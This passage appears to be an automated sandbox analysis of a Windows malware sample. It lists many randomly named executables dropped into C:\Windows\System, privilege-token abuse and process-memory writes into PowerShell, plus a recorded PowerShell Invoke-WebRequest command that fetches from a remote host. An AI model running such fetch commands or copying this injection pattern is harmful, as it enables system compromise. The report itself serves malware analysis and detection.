File created C:\Windows\System\pRtwXAg.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\xQJOIKt.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\BRaanud.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\dgOFnVR.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\zlfVkQW.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\NXsGCPm.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\lUtlzIl.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\mFaCCuI.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\bqJWpln.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\bFeaCvk.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\kXTXkmP.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2028 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2028 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2028 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2028 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\iawBxss.exe
PID 2028 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\iawBxss.exe
PID 2028 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\iawBxss.exe
PID 2028 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\IMxQeDg.exe
PID 2028 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\IMxQeDg.exe
PID 2028 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\IMxQeDg.exe
PID 2028 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\mdpHVaO.exe
PID 2028 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\mdpHVaO.exe
PID 2028 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\mdpHVaO.exe
PID 2028 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\hUiYhNq.exe
PID 2028 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\hUiYhNq.exe
PID 2028 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\hUiYhNq.exe
PID 2028 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\aoXmZlP.exe
PID 2028 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\aoXmZlP.exe
PID 2028 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\aoXmZlP.exe
PID 2028 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\WfDaPnl.exe
PID 2028 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\WfDaPnl.exe
PID 2028 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\WfDaPnl.exe
PID 2028 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\vYwvYEh.exe
PID 2028 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\vYwvYEh.exe
PID 2028 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\vYwvYEh.exe
PID 2028 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\pCqwNwX.exe
PID 2028 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\pCqwNwX.exe
PID 2028 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\pCqwNwX.exe
PID 2028 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\cmSvGdc.exe
PID 2028 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\cmSvGdc.exe
PID 2028 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\cmSvGdc.exe
PID 2028 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\SHtzeCg.exe
PID 2028 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\SHtzeCg.exe
PID 2028 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\SHtzeCg.exe
PID 2028 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\sDXcMzj.exe
PID 2028 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\sDXcMzj.exe
PID 2028 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\sDXcMzj.exe
PID 2028 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\dpXuEkL.exe
PID 2028 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\dpXuEkL.exe
PID 2028 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\dpXuEkL.exe
PID 2028 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\MKyDVGE.exe
PID 2028 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\MKyDVGE.exe
PID 2028 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\MKyDVGE.exe
PID 2028 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\XBepHJA.exe
PID 2028 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\XBepHJA.exe
PID 2028 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\XBepHJA.exe
PID 2028 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\FymJLDi.exe
PID 2028 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\FymJLDi.exe
PID 2028 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\FymJLDi.exe
PID 2028 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\MGIOPBR.exe
PID 2028 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\MGIOPBR.exe
PID 2028 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\MGIOPBR.exe
PID 2028 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\LywOsCg.exe
PID 2028 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\LywOsCg.exe
PID 2028 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\LywOsCg.exe
PID 2028 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\KoguhDL.exe
PID 2028 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\KoguhDL.exe
PID 2028 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\KoguhDL.exe
PID 2028 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\LIvLElR.exe
PID 2028 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\LIvLElR.exe
PID 2028 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\LIvLElR.exe
PID 2028 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\OwyhNjg.exe
PID 2028 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\OwyhNjg.exe
PID 2028 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\OwyhNjg.exe
PID 2028 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\zsReYhU.exe

Processes

C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe

"C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\iawBxss.exe

C:\Windows\System\iawBxss.exe

C:\Windows\System\IMxQeDg.exe

C:\Windows\System\IMxQeDg.exe

C:\Windows\System\mdpHVaO.exe

C:\Windows\System\mdpHVaO.exe

C:\Windows\System\hUiYhNq.exe

C:\Windows\System\hUiYhNq.exe

C:\Windows\System\aoXmZlP.exe

C:\Windows\System\aoXmZlP.exe

C:\Windows\System\WfDaPnl.exe

C:\Windows\System\WfDaPnl.exe

C:\Windows\System\vYwvYEh.exe

C:\Windows\System\vYwvYEh.exe

C:\Windows\System\pCqwNwX.exe

C:\Windows\System\pCqwNwX.exe

C:\Windows\System\cmSvGdc.exe

C:\Windows\System\cmSvGdc.exe

C:\Windows\System\SHtzeCg.exe

C:\Windows\System\SHtzeCg.exe

C:\Windows\System\sDXcMzj.exe

C:\Windows\System\sDXcMzj.exe

C:\Windows\System\dpXuEkL.exe

C:\Windows\System\dpXuEkL.exe

C:\Windows\System\MKyDVGE.exe

C:\Windows\System\MKyDVGE.exe

C:\Windows\System\XBepHJA.exe

C:\Windows\System\XBepHJA.exe

C:\Windows\System\FymJLDi.exe

C:\Windows\System\FymJLDi.exe

C:\Windows\System\MGIOPBR.exe

C:\Windows\System\MGIOPBR.exe

C:\Windows\System\LywOsCg.exe

C:\Windows\System\LywOsCg.exe

C:\Windows\System\KoguhDL.exe

C:\Windows\System\KoguhDL.exe

C:\Windows\System\LIvLElR.exe

C:\Windows\System\LIvLElR.exe

C:\Windows\System\OwyhNjg.exe

C:\Windows\System\OwyhNjg.exe

C:\Windows\System\zsReYhU.exe

C:\Windows\System\zsReYhU.exe

C:\Windows\System\ssfKygU.exe

C:\Windows\System\ssfKygU.exe

C:\Windows\System\tvtLwKN.exe

C:\Windows\System\tvtLwKN.exe

C:\Windows\System\STEbEWe.exe

C:\Windows\System\STEbEWe.exe

C:\Windows\System\ubnHeig.exe

C:\Windows\System\ubnHeig.exe

C:\Windows\System\SbRwguE.exe

C:\Windows\System\SbRwguE.exe

C:\Windows\System\iDiNEvG.exe

C:\Windows\System\iDiNEvG.exe

C:\Windows\System\DpjydzP.exe

C:\Windows\System\DpjydzP.exe

C:\Windows\System\elxqewp.exe

C:\Windows\System\elxqewp.exe

C:\Windows\System\TMswONZ.exe

C:\Windows\System\TMswONZ.exe

C:\Windows\System\qpIxbZk.exe

C:\Windows\System\qpIxbZk.exe

C:\Windows\System\qwXBXvN.exe

C:\Windows\System\qwXBXvN.exe

C:\Windows\System\AGTlwZP.exe

C:\Windows\System\AGTlwZP.exe

C:\Windows\System\hWMsrMp.exe

C:\Windows\System\hWMsrMp.exe

C:\Windows\System\gAkrhtC.exe

C:\Windows\System\gAkrhtC.exe

C:\Windows\System\KjwrZhi.exe

C:\Windows\System\KjwrZhi.exe

C:\Windows\System\QMvrexs.exe

C:\Windows\System\QMvrexs.exe

C:\Windows\System\YTMCFbe.exe

C:\Windows\System\YTMCFbe.exe

C:\Windows\System\AzTwmte.exe

C:\Windows\System\AzTwmte.exe

C:\Windows\System\kUvhJZj.exe

C:\Windows\System\kUvhJZj.exe

C:\Windows\System\VXRqhJH.exe

C:\Windows\System\VXRqhJH.exe

C:\Windows\System\ntFKvJv.exe

C:\Windows\System\ntFKvJv.exe

C:\Windows\System\cmzyXRx.exe

C:\Windows\System\cmzyXRx.exe

C:\Windows\System\WoqRTHI.exe

C:\Windows\System\WoqRTHI.exe

C:\Windows\System\jjdWfMm.exe

C:\Windows\System\jjdWfMm.exe

C:\Windows\System\ZrfFYWp.exe

C:\Windows\System\ZrfFYWp.exe

C:\Windows\System\yogLUqW.exe

C:\Windows\System\yogLUqW.exe

C:\Windows\System\vlPBGpp.exe

C:\Windows\System\vlPBGpp.exe

C:\Windows\System\LIIKaYf.exe

C:\Windows\System\LIIKaYf.exe

C:\Windows\System\BgZsuKY.exe

C:\Windows\System\BgZsuKY.exe

C:\Windows\System\AljXIbV.exe

C:\Windows\System\AljXIbV.exe

C:\Windows\System\BBaqElR.exe

C:\Windows\System\BBaqElR.exe

C:\Windows\System\TqovUPM.exe

C:\Windows\System\TqovUPM.exe

C:\Windows\System\axBuOeK.exe

C:\Windows\System\axBuOeK.exe

C:\Windows\System\PuFmpuD.exe

C:\Windows\System\PuFmpuD.exe

C:\Windows\System\vaemntu.exe

C:\Windows\System\vaemntu.exe

C:\Windows\System\StFWysm.exe

C:\Windows\System\StFWysm.exe

C:\Windows\System\LXsGwsh.exe

C:\Windows\System\LXsGwsh.exe

C:\Windows\System\Dnxateq.exe

C:\Windows\System\Dnxateq.exe

C:\Windows\System\wJdTIcf.exe

C:\Windows\System\wJdTIcf.exe

C:\Windows\System\jbgHETG.exe

C:\Windows\System\jbgHETG.exe

C:\Windows\System\zJveOin.exe

C:\Windows\System\zJveOin.exe

C:\Windows\System\LXCzeVQ.exe

C:\Windows\System\LXCzeVQ.exe

C:\Windows\System\euOVVKr.exe

C:\Windows\System\euOVVKr.exe

C:\Windows\System\SqsKxdM.exe

C:\Windows\System\SqsKxdM.exe

C:\Windows\System\DreWwNz.exe

C:\Windows\System\DreWwNz.exe

C:\Windows\System\HtdaRhO.exe

C:\Windows\System\HtdaRhO.exe

C:\Windows\System\SpBkmNL.exe

C:\Windows\System\SpBkmNL.exe

C:\Windows\System\Gnvttgl.exe

C:\Windows\System\Gnvttgl.exe

C:\Windows\System\VSBnIWJ.exe

C:\Windows\System\VSBnIWJ.exe

C:\Windows\System\EhcOFTk.exe

C:\Windows\System\EhcOFTk.exe

C:\Windows\System\TUwiyVR.exe

C:\Windows\System\TUwiyVR.exe

C:\Windows\System\pLkDauB.exe

C:\Windows\System\pLkDauB.exe

C:\Windows\System\PTfZKGr.exe

C:\Windows\System\PTfZKGr.exe

C:\Windows\System\RCvVdpT.exe

C:\Windows\System\RCvVdpT.exe

C:\Windows\System\RVUKtFK.exe

C:\Windows\System\RVUKtFK.exe

C:\Windows\System\biSLayY.exe

C:\Windows\System\biSLayY.exe

C:\Windows\System\wgdoUsY.exe

C:\Windows\System\wgdoUsY.exe

C:\Windows\System\vrioLlo.exe

C:\Windows\System\vrioLlo.exe

C:\Windows\System\ERNYHyJ.exe

C:\Windows\System\ERNYHyJ.exe

C:\Windows\System\cyxDmfq.exe

C:\Windows\System\cyxDmfq.exe

C:\Windows\System\oMtfcaD.exe

C:\Windows\System\oMtfcaD.exe

C:\Windows\System\QnwwXTM.exe

C:\Windows\System\QnwwXTM.exe

C:\Windows\System\VMHHaNn.exe

C:\Windows\System\VMHHaNn.exe

C:\Windows\System\dWvXFjt.exe

C:\Windows\System\dWvXFjt.exe

C:\Windows\System\enRCFtP.exe

C:\Windows\System\enRCFtP.exe

C:\Windows\System\yFuJIvY.exe

C:\Windows\System\yFuJIvY.exe

C:\Windows\System\NNddisB.exe

C:\Windows\System\NNddisB.exe

C:\Windows\System\rsezCZI.exe

C:\Windows\System\rsezCZI.exe

C:\Windows\System\qNzvbom.exe

C:\Windows\System\qNzvbom.exe

C:\Windows\System\ToWXvSg.exe

C:\Windows\System\ToWXvSg.exe

C:\Windows\System\dRALyqh.exe

C:\Windows\System\dRALyqh.exe

C:\Windows\System\AiXlAoS.exe

C:\Windows\System\AiXlAoS.exe

C:\Windows\System\RIoObup.exe

C:\Windows\System\RIoObup.exe

C:\Windows\System\YRwHaoV.exe

C:\Windows\System\YRwHaoV.exe

C:\Windows\System\jyiKvZZ.exe

C:\Windows\System\jyiKvZZ.exe

C:\Windows\System\TUJvnAa.exe

C:\Windows\System\TUJvnAa.exe

C:\Windows\System\DgVPWbd.exe

C:\Windows\System\DgVPWbd.exe

C:\Windows\System\sbzfNka.exe

C:\Windows\System\sbzfNka.exe

C:\Windows\System\ZOJYoPL.exe

C:\Windows\System\ZOJYoPL.exe

C:\Windows\System\xkRdEpc.exe

C:\Windows\System\xkRdEpc.exe

C:\Windows\System\IooTQRK.exe

C:\Windows\System\IooTQRK.exe

C:\Windows\System\hZAJYhG.exe

C:\Windows\System\hZAJYhG.exe

C:\Windows\System\RFlkNWJ.exe

C:\Windows\System\RFlkNWJ.exe

C:\Windows\System\Nvssafp.exe

C:\Windows\System\Nvssafp.exe

C:\Windows\System\xWdQeXt.exe

C:\Windows\System\xWdQeXt.exe

C:\Windows\System\bdtqvwI.exe

C:\Windows\System\bdtqvwI.exe

C:\Windows\System\fAvgdSg.exe

C:\Windows\System\fAvgdSg.exe

C:\Windows\System\pSYbQUX.exe

C:\Windows\System\pSYbQUX.exe

C:\Windows\System\yGaKSfj.exe

C:\Windows\System\yGaKSfj.exe

C:\Windows\System\aiGWPTL.exe

C:\Windows\System\aiGWPTL.exe

C:\Windows\System\gsCDkEL.exe

C:\Windows\System\gsCDkEL.exe

C:\Windows\System\eOrAnrh.exe

C:\Windows\System\eOrAnrh.exe

C:\Windows\System\mSQjFFR.exe

C:\Windows\System\mSQjFFR.exe

C:\Windows\System\smkVjlx.exe

C:\Windows\System\smkVjlx.exe

C:\Windows\System\GPyRIKo.exe

C:\Windows\System\GPyRIKo.exe

C:\Windows\System\VSEfmrs.exe

C:\Windows\System\VSEfmrs.exe

C:\Windows\System\eSGKMNg.exe

C:\Windows\System\eSGKMNg.exe

C:\Windows\System\xgjPWoo.exe

C:\Windows\System\xgjPWoo.exe

C:\Windows\System\mjeeUSV.exe

C:\Windows\System\mjeeUSV.exe

C:\Windows\System\jaBBLYg.exe

C:\Windows\System\jaBBLYg.exe

C:\Windows\System\MybFwYl.exe

C:\Windows\System\MybFwYl.exe

C:\Windows\System\xQOPHPP.exe

C:\Windows\System\xQOPHPP.exe

C:\Windows\System\yNfWOoW.exe

C:\Windows\System\yNfWOoW.exe

C:\Windows\System\EaSEqwh.exe

C:\Windows\System\EaSEqwh.exe

C:\Windows\System\NRDzXUk.exe

C:\Windows\System\NRDzXUk.exe

C:\Windows\System\fRBVIyw.exe

C:\Windows\System\fRBVIyw.exe

C:\Windows\System\JYCRkJS.exe

C:\Windows\System\JYCRkJS.exe

C:\Windows\System\zJqJari.exe

C:\Windows\System\zJqJari.exe

C:\Windows\System\JAymTYD.exe

C:\Windows\System\JAymTYD.exe

C:\Windows\System\uPgPhPP.exe

C:\Windows\System\uPgPhPP.exe

C:\Windows\System\gmtaNCs.exe

C:\Windows\System\gmtaNCs.exe

C:\Windows\System\QvSDKeQ.exe

C:\Windows\System\QvSDKeQ.exe

C:\Windows\System\XFXpWkc.exe

C:\Windows\System\XFXpWkc.exe

C:\Windows\System\oCahgoG.exe

C:\Windows\System\oCahgoG.exe

C:\Windows\System\Wvirehw.exe

C:\Windows\System\Wvirehw.exe

C:\Windows\System\GrTABho.exe

C:\Windows\System\GrTABho.exe

C:\Windows\System\BBBGvRE.exe

C:\Windows\System\BBBGvRE.exe

C:\Windows\System\tWfUHyQ.exe

C:\Windows\System\tWfUHyQ.exe

C:\Windows\System\CMhoBVL.exe

C:\Windows\System\CMhoBVL.exe

C:\Windows\System\xAoFzxi.exe

C:\Windows\System\xAoFzxi.exe

C:\Windows\System\xzMXKiA.exe

C:\Windows\System\xzMXKiA.exe

C:\Windows\System\GCLYeRK.exe

C:\Windows\System\GCLYeRK.exe

C:\Windows\System\asxNfTa.exe

C:\Windows\System\asxNfTa.exe

C:\Windows\System\tGiESxX.exe

C:\Windows\System\tGiESxX.exe

C:\Windows\System\oukDsGJ.exe

C:\Windows\System\oukDsGJ.exe

C:\Windows\System\MHHnuFc.exe

C:\Windows\System\MHHnuFc.exe

C:\Windows\System\djyKWwA.exe

C:\Windows\System\djyKWwA.exe

C:\Windows\System\werTttV.exe

C:\Windows\System\werTttV.exe

C:\Windows\System\wGMHiXt.exe

C:\Windows\System\wGMHiXt.exe

C:\Windows\System\ILhZDtS.exe

C:\Windows\System\ILhZDtS.exe

C:\Windows\System\rpxdLBm.exe

C:\Windows\System\rpxdLBm.exe

C:\Windows\System\NGnUMxA.exe

C:\Windows\System\NGnUMxA.exe

C:\Windows\System\MENMZic.exe

C:\Windows\System\MENMZic.exe

C:\Windows\System\mBGrrtX.exe

C:\Windows\System\mBGrrtX.exe

C:\Windows\System\fCjUpuS.exe

C:\Windows\System\fCjUpuS.exe

C:\Windows\System\cANsOVV.exe

C:\Windows\System\cANsOVV.exe

C:\Windows\System\PYolBpU.exe

C:\Windows\System\PYolBpU.exe

C:\Windows\System\StxdHId.exe

C:\Windows\System\StxdHId.exe

C:\Windows\System\CZgafNu.exe

C:\Windows\System\CZgafNu.exe

C:\Windows\System\OydRXNE.exe

C:\Windows\System\OydRXNE.exe

C:\Windows\System\cUtQkJm.exe

C:\Windows\System\cUtQkJm.exe

C:\Windows\System\OzqedeE.exe

C:\Windows\System\OzqedeE.exe

C:\Windows\System\dBACmrP.exe

C:\Windows\System\dBACmrP.exe

C:\Windows\System\wNBiaBW.exe

C:\Windows\System\wNBiaBW.exe

C:\Windows\System\IxFpSSI.exe

C:\Windows\System\IxFpSSI.exe

C:\Windows\System\BmOekCK.exe

C:\Windows\System\BmOekCK.exe

C:\Windows\System\bHuXRux.exe

C:\Windows\System\bHuXRux.exe

C:\Windows\System\SIfbezm.exe

C:\Windows\System\SIfbezm.exe

C:\Windows\System\YZcAFks.exe

C:\Windows\System\YZcAFks.exe

C:\Windows\System\fCORijg.exe

C:\Windows\System\fCORijg.exe

C:\Windows\System\bTxYZaP.exe

C:\Windows\System\bTxYZaP.exe

C:\Windows\System\eiCLxfh.exe

C:\Windows\System\eiCLxfh.exe

C:\Windows\System\XYWPxZz.exe

C:\Windows\System\XYWPxZz.exe

C:\Windows\System\mMCGwhk.exe

C:\Windows\System\mMCGwhk.exe

C:\Windows\System\HFbTCXK.exe

C:\Windows\System\HFbTCXK.exe

C:\Windows\System\JrzhOwO.exe

C:\Windows\System\JrzhOwO.exe

C:\Windows\System\RirMEUD.exe

C:\Windows\System\RirMEUD.exe

C:\Windows\System\HdrSamS.exe

C:\Windows\System\HdrSamS.exe

C:\Windows\System\YwLQnIJ.exe

C:\Windows\System\YwLQnIJ.exe

C:\Windows\System\iSirwTC.exe

C:\Windows\System\iSirwTC.exe

